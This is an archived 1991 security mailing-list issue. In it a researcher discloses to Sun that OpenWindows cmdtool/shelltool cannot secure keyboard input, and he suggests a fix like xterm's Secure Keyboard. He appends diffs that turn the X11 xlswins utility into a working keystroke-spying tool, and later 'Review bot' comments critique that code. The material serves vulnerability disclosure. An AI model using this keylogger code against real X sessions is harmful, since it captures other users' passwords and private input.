The 'Security Digest' Archives (TM)


ARCHIVE: Core 'Security Digest' - Archives (1990 - 1991)
DOCUMENT: Core 'Security Digest' V1 #18 1991-05-31 (1 file, 2752 bytes)
SOURCE: http://securitydigest.org/exec/display?f=core/archive/118.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.

START OF DOCUMENT


Date: Fri May 31 12:54:15 PDT 1991
Subject: Core Security Digest V1 #18

Core Security Digest Volume 1 Issue 18

subject(s):

            OpenWindows security problem

The unix core security mailing list is by invitation only and contains
sensitive material which SHOULD NOT BE REVEALED to non-members.
DO NOT PUT ANY LIST CONTENTS IN LOCATIONS ACCESSIBLE TO NON-MEMBERS.
If you must keep copies on-line, please encrypt them at the very least.

PLEASE POST TO:                              core@uninet.cpd.com
PLEASE SEND EMERGENCY ALERTS TO:   core-emergency@uninet.cpd.com
PLEASE SEND REQUESTS TO:             core-request@uninet.cpd.com


------------------------------------------------------------------------

Date: Fri, 24 May 91 17:14:54 -0400
From: steve@umiacs.UMD.EDU (Steve D. Miller)
Subject: OpenWindows security problem

Here's a copy of something I just sent off to security-alert@sun.com.  If
I had OpenWindows sources, I'd go fix this, but I don't, so...   My apologies
if this is old hat to everyone, or if it's mentioned in the release notes
somewhere.

Description:
	Because it seems to be impossible to tell cmdtool/shelltool to
	do a keyboard grab, typing passwords or sensitive information in
	an OpenWindows cmdtool or shelltool is inherently insecure.

Repeat-By:
	[ Note: we use cmdtool to refer to both cmdtool and shelltool,
	since they're the same program. ]

	Write a program that registers an interest in keyboard events for a
	cmdtool window, and that turns those events back into strings.  Then
	run that program against a cmdtool and go type in the cmdtool.
	Watch the spy program you wrote print out what you're typing.

	Next go run an xterm from MIT X11R4, run the spy program against
	that window; the spy will still show you what you're typing.  Now
	select Secure Keyboard from the Main Options menu (ctrl-left, by
	default) and type in the xterm some more; note that the spy isn't
	at this point showing what you're typing.

	I do have a primitive spy program that does this.  I'm certainly
	not an X11 guru -- this is my second or third X11 program, and
	none of them have been more than about 100 lines long -- but this
	still didn't take me more than an hour and a half to write.  The
	diffs (based on the vanilla X11R4 sources to xlswins) are at the
	end of this message.

Fix:
	Add the same basic type of code to cmdtool that was added to xterm.
	You'll need to add a new menu entry somewhere so people can get at
	the Secure Keyboard function.

	It's possible that closing this hole won't really help anything, as
	it occurs to me that maybe one can use the NeWS part of xnews to get
	the same information.  I don't know enough about either X11, NeWS,
	or xnews to be able to say anything useful there, so I won't.

	Yes, I know that using a real authentication protocol (or an
	approximation, such as MIT-MAGIC-COOKIE-1) makes it a lot harder to
	do this sort of thing.  Still, it's not impossible, and besides, it
	took a long time just to get the users to understand xhost, so they
	probably won't understand xauth for a while yet.  (-:

Spoken: Steve Miller    Domain: steve@umiacs.umd.edu    UUCP: uunet!mimsy!steve
Phone: +1-301-405-6736  USPS: UMIACS, Univ. of Maryland, College Park, MD 20742

[ start diffs to xlswins ]
*** old xlswins.c	Fri May 24 16:54:53 1991
--- xlswins.c	Fri May 24 16:54:53 1991
***************
*** 32,37 ****
--- 32,41 ----
  static char *output_format = "0x%lx";
  static char widget_name_buf[1024], widget_class_buf[1024];

+ #define MAX_STRING	100
+ char buffer[MAX_STRING];
+ Bool do_spy;
+
  static void usage ()
  {
      static char *help[] = {
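Review bot: `buffer` and `do_spy` are added as external globals, while the declarations directly above them (`output_format`, `widget_name_buf`, `widget_class_buf`) are all `static`. Declare both `static` so they stay file-local like the rest of the file's state; `buffer` is only needed by the event loop, so it could equally be a local in main().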
***************
*** 40,45 ****
--- 44,50 ----
  "    -indent number                   amount to indent per level",
  "    -long                            print a long listing",
  "    -resources                       print a listing of widget resources",
+ "    -spy                             spy on keyboard input to all windows",
  "",
  NULL};
      char **cpp;
***************
*** 123,128 ****
--- 128,138 ----
  {
      char *displayname = NULL;
      Display *dpy;
+     XEvent nextevent;
+     XKeyEvent *foo = (XKeyEvent *)&nextevent;
+     KeySym keysym;
+     XComposeStatus comp;
+     int bufsiz = MAX_STRING;
      Bool long_version = False;
      Bool print_resources = False;
      int i;
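Review bot: `XKeyEvent *foo = (XKeyEvent *)&nextevent;` reaches into the event union through a cast and a placeholder name. The XEvent union already exposes the key event as `nextevent.xkey`, so the extra pointer and the cast can be dropped. `bufsiz` is never modified after `int bufsiz = MAX_STRING;`, so the constant (or `sizeof buffer`) can be used directly at the call site.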
***************
*** 129,134 ****
--- 139,145 ----
      int indent = 2;

      ProgramName = argv[0];
+     do_spy = False;

      for (i = 1; i < argc; i++) {
  	char *arg = argv[i];
***************
*** 149,154 ****
--- 160,168 ----
  	      case 'r':			/* -resources */
  		print_resources = True;
  		continue;
+ 	      case 's':			/* -spy */
+ 		do_spy = True;
+ 		continue;
  	      case 'f':			/* -format [odh] */
  		if (++i >= argc) usage ();
  		switch (argv[i][0]) {
***************
*** 199,204 ****
--- 213,245 ----
  	}
      }

+     if (do_spy == True) {
+ 	while (1) {
+ 	    int i, count;
+
+ 	    XNextEvent(dpy, &nextevent);
+ 	    if (nextevent.type == KeyPress) {
+ 		count = XLookupString(&nextevent, buffer, bufsiz,
+ 		    &keysym, &comp);
+ 		buffer[count] = '\0';
+ 		printf("in window %x got: ", foo->window);
+ 		for (i = 0 ; i < count ; i++) {
+ 		    if (buffer[i] & 0x80) {
+ 			putchar('~');
+ 			buffer[i] &= 0x7f;
+ 		    }
+ 		    if (buffer[i] < ' ') {
+ 			putchar('^');
+ 			buffer[i] |= 0x40;
+ 		    }
+ 		    putchar(buffer[i]);
+ 		}
+ 	    putchar('\n');
+ 	    fflush(stdout);
+ 	    }
+ 	}
+     }
+
      XCloseDisplay (dpy);
      exit (0);
  }
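Review bot: `buffer[count] = '\0';` can write one byte past the end of `buffer`. XLookupString is told the buffer holds `bufsiz` (MAX_STRING) bytes and may return that many, but `buffer` is declared as `char buffer[MAX_STRING]`, leaving no room for the terminator. Pass `bufsiz - 1` as the length or declare the buffer with MAX_STRING + 1 bytes. In the same call, `&nextevent` is an `XEvent *` where XLookupString takes an `XKeyEvent *`; `foo` or `&nextevent.xkey` has the right type. `printf("in window %x got: ", foo->window)` prints a Window, which is an unsigned long, with `%x`; the file's own `output_format` uses `%lx`. The `while (1)` has no exit, so the `XCloseDisplay (dpy); exit (0);` that follows is unreachable once `-spy` is given, and the `putchar('\n'); fflush(stdout);` pair is indented one level short of the `if` block it belongs to.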
***************
*** 279,284 ****
--- 320,327 ----

      if (got_xerror) goto done;

+     if (do_spy == True)
+ 	XSelectInput(dpy, w, KeyPressMask);
      if (!XQueryTree (dpy, w, &root, &parent, &children, &nchildren))
        goto done;

------------------------------------------------------------------------

        End of Core Security Digest Volume 1 Issue 18
        **********************

END OF DOCUMENT